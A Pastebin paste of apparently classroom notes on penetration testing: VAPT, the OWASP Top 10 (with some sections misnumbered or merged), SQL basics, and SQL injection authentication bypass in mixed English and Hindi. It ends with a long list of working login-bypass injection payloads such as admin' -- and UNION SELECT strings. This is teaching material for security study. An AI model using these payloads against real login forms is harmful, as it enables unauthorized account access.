API tools faq
paste
Advertisement
Guest User

hello world!

a guest
Nov 2nd, 2018
77
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.29 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3. VAPT
  4. Vulnerability Assessment Penetration Testing
  5. VAPT EXPERT = Vulnerability Assessment and Penetration Testing expert,
  6.  
  7. so VULNERABILITY ASSESSMENT is a pre-hacking phase in which the intended person scans and tries to find out the security gaps or holes that make the device or software vulnerable
  8.  
  9. Example
  10. ip address -> 192.168.1.55
  11. open ports(ports on which some application may be listening)
  12. Filtered ports-(Firewall protected)
  13. os information -is it upto date?
  14. Service running on ports
  15.  
  16.  
  17. PENETRATION TESTING is a phase in which the intended person actually tests out the systems by simulating attacks on the systems
  18.  
  19. Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack like a malicious hacker. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and involves active exploitation of security vulnerabilities.
  20.  
  21. Example using Exploits for known vulnerability
  22.  
  23. ->windows 7 Server
  24.  
  25. ->Using exploit to exploit the server
  26.  
  27. AT the end a proof of concept is need to be made a handed to Senior Authority
  28.  
  29. Example
  30. Big banks or smart car manufacturers hire security professionals to hack into their systems ethically and they pay large sums of money to them to do that in the end of VAPT a Vapt report needs to be handed to the bank's security team
  31.  
  32.  
  33. __________________________________________________
  34.  
  35.  
  36.  
  37. Owasp ->Open Web Application Security Project
  38.  
  39. Owasp top 10
  40.  
  41. 1. Injection
  42. 2. Broken Authentication and Session Management
  43. 3. Cross Site Scripting(XSS)
  44. 4. Insecure Direct Object Reference
  45. 5. Security Misconfiguration
  46. 6. Sensitive Data Exposure
  47. 7. Missing Function Level Access Control
  48. 8. Cross site request forgery
  49. 9. Using Known Vulnerable Components
  50. 10.Unvalidated Redirects and Forwards
  51.  
  52.  
  53.  
  54. 1. Injection Vulnerabilities--> Sql,Commands
  55.  
  56. Injection Attack occurs only if hacker's are able to send malicious unintended data from an application to the interpreter or say backend of the website .
  57.  
  58. application->untrusted data->interpreter(backend)
  59.  
  60. why this attacks occurs ->>
  61. This attack occurs because of improper validation-> for e.g lets take the example of a signin or signup field on a computer web application ,now when a user is trying to sign-in or sign-up
  62. it requires user to enter id/password in a certain manner, like there should be no special characters involved etc, You will learn about that as regular expressions
  63.  
  64. Similarly when a developer is setting up a webapp/or application he/she need to validate all the parameter,link and domains of the website so that commands or special character dont work.
  65. __________________________________________________________________
  66. 2. Broken Authentication and Session Management
  67.  
  68. In broken authentication or session management hackers make an attempt to steal account from another users, Attackers/hacker uses leaks and flaws in the authentication or session management Functions.
  69.  
  70. Why this attack occurs
  71.  
  72. ->User credentials are not protected when stored using hashing or encryption
  73. -
  74. >Credentials can be guessed or overwritten through weak management functions eg(Hacker is able to guess session id , or change password)
  75.  
  76. ->Session id's are exposed in the url
  77. ->Session id's don't time out
  78. ->passwords,credentials,session-ids are sent over in un encrypted form
  79. ______________________________________________________________________
  80.  
  81. 3. Cross Site Scripting (XSS)
  82.  
  83. It is an attack in which hackers are able to execute javascript code on a web site, It is of three types
  84.  
  85. ->XSS Reflected
  86.  
  87. ->XSS Stored
  88.  
  89. ->DOM(Document object model) based XSS
  90.  
  91. This attack can be used by hacker to execute javascript code in victim browser to hijack user sessions,deface website, insert content, etc
  92.  
  93. Why this attack occurs
  94.  
  95. ->Improper Validation
  96. ->Unsafe JavaScript API
  97.  
  98. The pentesting of a website can easily protect form xss attacks and xss can also be found with simple code analysis.
  99. _______________________________________________________________________________
  100.  
  101. 4. Insecure Direct Object Reference
  102.  
  103.  
  104. It is a vulnerability in which an attacker who is authorised to his/her own dash board is able to gain access to some other users account for
  105.  
  106. As the name is security misconfiguration what it means is imagine a webapp having admin accounts on it or just having default accounts with default passwords but having certain privledges . Now if you run a website which has default accounts configured and your website is available in the public domain. Now from an attackers perspective he/she can actually go out and try out default credentials and would be able to log in the website.
  107.  
  108. why this attack occurs->
  109. ->Keeping default credentials
  110. ->Using a component or plugin which may have some default credentials
  111. e.g
  112. Directory listing is not disabled on your server.
  113. Attacker discovers she can simply list directories to find any
  114. file. Attacker finds and downloads all your compiled Java
  115. classes, which she decompiles and reverse engineers to get all
  116. your custom code. She then finds a serious access control
  117. flaw in your application
  118. _______________________________________________________________________
  119.  
  120. 6.Sensitive Data Exposure
  121. Sensitive data exposure is a vulnerability that occurs when a hacker is able to gain access to sensitive data in motion or at rest or even at customer/users browser
  122.  
  123.  
  124. eg 1
  125. An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.
  126.  
  127. eg 2
  128. A site simply doesn’t use SSL for all authenticated pages. Attacker simply monitors network
  129. traffic (like an open wireless network), and steals the user’s session cookie. Attacker then replays this cookie and hijacks the user’s session, accessing the user’s private data.
  130.  
  131.  
  132. _____________________________________________________________________________
  133. 7. Missing Function Level Access Control
  134. ->It is an attack in which a hacker or an anonymous person is able able to access an application interface that it would otherwise never been able to access.
  135.  
  136. eg www.anywebsite.com/user
  137.  
  138. and hacker is able to access www.anywebsite.com/admin
  139. now if a hacker /person is able to do that it is a flaw.
  140. ____________________________________________________________
  141. 8. Cross site request Forgery.
  142. In this attack the hacker creates a forged http request and tricks victim into submitting that request via images tabs or xss
  143.  
  144.  
  145.  
  146. The application allows a user to submit a state changing request that does not include anything secret.
  147. For example:
  148. http://anywebsite.com/app/transferFunds?amount=1500&destinationAccount=4673243243
  149. this all done by making the victim click on a link or on a certain appealing image
  150. ________________________________________________________________
  151.  
  152. 9. Using Components with Known Vulnerability
  153. In this case hacker tries to discover a weak component through scanning or manual analysis and then either finds out an exploit if already available or writes an exploit
  154.  
  155. eg
  156. a website using a server which has an rce exploit
  157. or
  158. a wordpress website which has a vulnerable component and has an exploit.
  159. ___________________________________________________________________________________
  160.  
  161. 10.Unvalidated Redirects and Forwards
  162. Attacker links to unvalidated redirects and tricks victim into clicking it,attacker targets unsafe forwards to bypass security check.
  163.  
  164. eg http://anywebsite.com/redirect.jsp?url=evil.com
  165.  
  166. ->->url=evil.com<-<-
  167.  
  168. ______________________________________________________________________________________
  169. Introduction to DBMS
  170. Database
  171.  
  172. Database is a collection of structured data set which contains all the data(important credentials,logs,etc)
  173. Database Management system-This data needs to be managed and it is done with help of dbms ,Dbms can also interact with user and writes user data to database.
  174.  
  175. Database can be of two types
  176. SQL
  177. No SQL
  178. There are certain tables and entries in a database
  179.  
  180. table name Member
  181. _________________________________________________________
  182. Name | ID | NUMBER | EMAIL | ADDRESS | Age |
  183. _________________________________________________________
  184. deepak|10|9123456719|deepak@yahoo.co.in|lokhandvala|26 |
  185. Gagan |4 |9145619237|gagan@gmail.com |Delhi |20 |
  186. _________________________________________________________
  187.  
  188.  
  189. Structured querries would look like
  190. for example
  191. all the people who have age less then 30
  192. so query would look like
  193.  
  194. Select * from Member where age<30
  195.  
  196.  
  197. h.w perform all querries
  198. queries
  199. SELECT - extracts data from a database
  200. = UPDATE - updates data in a database
  201. = DELETE - deletes data from a database
  202. = INSERT INTO - inserts new data into a database
  203. = CREATE DATABASE - creates a new database
  204. = ALTER DATABASE - modifies a database
  205. = CREATE TABLE - creates a new table
  206. = ALTER TABLE - modifies a table
  207. = DROP TABLE - deletes a table
  208. = SELECT * from trainees - Select everything from table name "trainees"
  209. = WHERE - Showing the location of the data of the table,column etc.
  210.  
  211. H.w Study Mongodb
  212. sql VS noSql
  213.  
  214. _________________________________
  215. LVS Setup configuration Practical
  216. _________________________________
  217.  
  218. ______________________________________________
  219. Sql Injection Authentication Bypass
  220.  
  221. at the time of authentication ho kya rha hen
  222. Lets Imagine
  223. koi querry hogi -> username== 'Something' && password=='Something'
  224.  
  225. if ham querry ko true karwade kisi Tareeke se and dbms confuse hojay to kya vo hame login dega??
  226.  
  227. for eg username = 1' or '1' = '1
  228. password = 1' or '1' = '1
  229.  
  230. or hum kya try kar sakte hen
  231. 0' or '0' = '0
  232. 2' or '2' = '2
  233. or
  234. 0' or '3' = '3
  235.  
  236. so basically you just need to manage to make querry true and if there is improper validation you can get access
  237.  
  238.  
  239.  
  240.  
  241.  
  242.  
  243. usernmamev =hello
  244. password = hello1
  245. \
  246. login
  247.  
  248.  
  249.  
  250. 1' or '1' = '1
  251. 1' or '1' = '1
  252.  
  253. asljhdaksd??where some where username='1' or '1' = '1' & password ='1' or '1' = '1'lajbnd,fsnfkns.d
  254.  
  255.  
  256.  
  257.  
  258.  
  259.  
  260.  
  261.  
  262. ___________________________________________
  263. or 1=1
  264. or 1=1--
  265. or 1=1#
  266. or 1=1/*
  267. admin' --
  268. admin' #
  269. admin'/*
  270. admin' or '1'='1
  271. admin' or '1'='1'--
  272. admin' or '1'='1'#
  273. admin' or '1'='1'/*
  274. admin'or 1=1 or ''='
  275. admin' or 1=1
  276. admin' or 1=1--
  277. admin' or 1=1#
  278. admin' or 1=1/*
  279. admin') or ('1'='1
  280. admin') or ('1'='1'--
  281. admin') or ('1'='1'#
  282. admin') or ('1'='1'/*
  283. admin') or '1'='1
  284. admin') or '1'='1'--
  285. admin') or '1'='1'#
  286. admin') or '1'='1'/*
  287. 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
  288. admin" --
  289. admin" #
  290. admin"/*
  291. admin" or "1"="1
  292. admin" or "1"="1"--
  293. admin" or "1"="1"#
  294. admin" or "1"="1"/*
  295. admin"or 1=1 or ""="
  296. admin" or 1=1
  297. admin" or 1=1--
  298. admin" or 1=1#
  299. admin" or 1=1/*
  300. admin") or ("1"="1
  301. admin") or ("1"="1"--
  302. admin") or ("1"="1"#
  303. admin") or ("1"="1"/*
  304. admin") or "1"="1
  305. admin") or "1"="1"--
  306. admin") or "1"="1"#
  307. admin") or "1"="1"/*
  308. 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!